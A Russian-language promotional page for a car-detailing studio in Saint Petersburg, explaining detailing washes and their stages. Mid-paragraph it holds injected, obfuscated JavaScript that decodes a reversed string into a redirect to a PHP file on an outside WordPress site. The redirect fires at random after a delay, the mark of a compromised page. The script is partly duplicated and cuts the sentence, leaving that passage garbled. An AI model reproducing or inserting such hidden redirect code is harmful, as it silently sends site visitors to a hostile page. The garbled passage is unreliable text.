Адрес: Витебский проспект, 1а г.Санкт-Петербург

8 921 444 41 78

Забронировать время и дату

Меню

Косметическое обслуживание, тюнинг и реставрация салона в Санкт-Петербурге

8 921 444 41 78

Забронировать время и дату

Детейлинг мойка

Любая услуга в студии детейлинга, будь то химчистка салона, покрытие защитными составами, $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-v-spb/» rel=»noopener» target=»_blank»>полировка, начинается с такой важной процедуры, как детейлинг мойка. Необходимость правильной чистки автомобиля имеет первостепенное значение, тем более что с развитием технологий и автоиндустрии развиваются и сфера, связанная с уходом за автотранспортом.

Отличие детейлинг мойки от обычной автомойки

Чтобы понять, что такое настоящая очистка и как правильно мыть машину, необходимо узнать, что происходит с ней во время обычного мытья на стандартных автомойках. С появлением бесконтактного метода, который на самом деле все равно контактный, процесс мытья автомашины сводится к следующему: кузов обливают водой, наносят сильнодействующую агрессивную химию, которая в течении некоторого времени растворяет грязь, затем все это смывают и насухо протирают тряпкой. При этом полностью загрязнения не вымываются, на поверхности остается слой абразивных частиц песка, так называемая статическая грязь, которая при вытирании тряпками оставляет микроцарапины и голограммы, характерной круглой формы. Если к этому добавить еще сильнощелочные средства, используемые простыми мойщиками, получится идеальный сценарий для разрушения ЛКП и особенно хромированных элементов любого вида транспорта.

Этапы детейлинг мойки

Наиболее безопасный и бережный для лака автокузова тип чистки – это трехфазная детейлинг мойка, которая делится на следующие этапы:

  • Бесконтактный – применение специального щадящего шампуня (наносится сразу на грязную машину).
  • Ручное воздействие – устранение въевшихся загрязнений и статики с помощью очистителей повышенной моющей способности, глины, автоскрабов щеток, кистей и проч.
  • Нанесение консерванта – наносостава, который придает дополнительный блеск и создает водоотталкивающий эффект, препятствующий быстрому накоплению пыли на ЛКП.
  • Финальная стадия – обязательная тщательная сушка с использованием турбо-фена и микрофибровых полотенец.

Одним из основных факторов в такой работе становится использование высококачественных химических продуктов, которые не только аккуратно и деликатно удаляют все глубокие пятна, но и являются экологически чистыми и безвредными для человека.

Необходимость детейлинг мойки после покрытия нанозащитой

Для тех автовладельцев, кто покрыл свой авто любым защищающим наносоставом – жидким стеклом, керамикой, пленкой, также следует помнить, что для сохранения полученного результата надолго мыться нужно только на детейлинг-мойке. Иначе при обслуживании на заурядных автомойках слой защиты скоро покроется царапинами, придет в негодность и потеряет свои протекционные свойства.

Профессиональный детейлинг для вашего авто в Санкт-Петербурге

Официальныая гарантия на все виды услуг

Авто после детейлинга

Узнайте стоимость детейлинга для вашего автомобиля

Оставьте свой телефон и ответьте на пару вопросов менеджера

Это бесплатно и ни к чему не обязывает

Если у вас нет времени, то просто позвоните нам:

8 921 444 41 78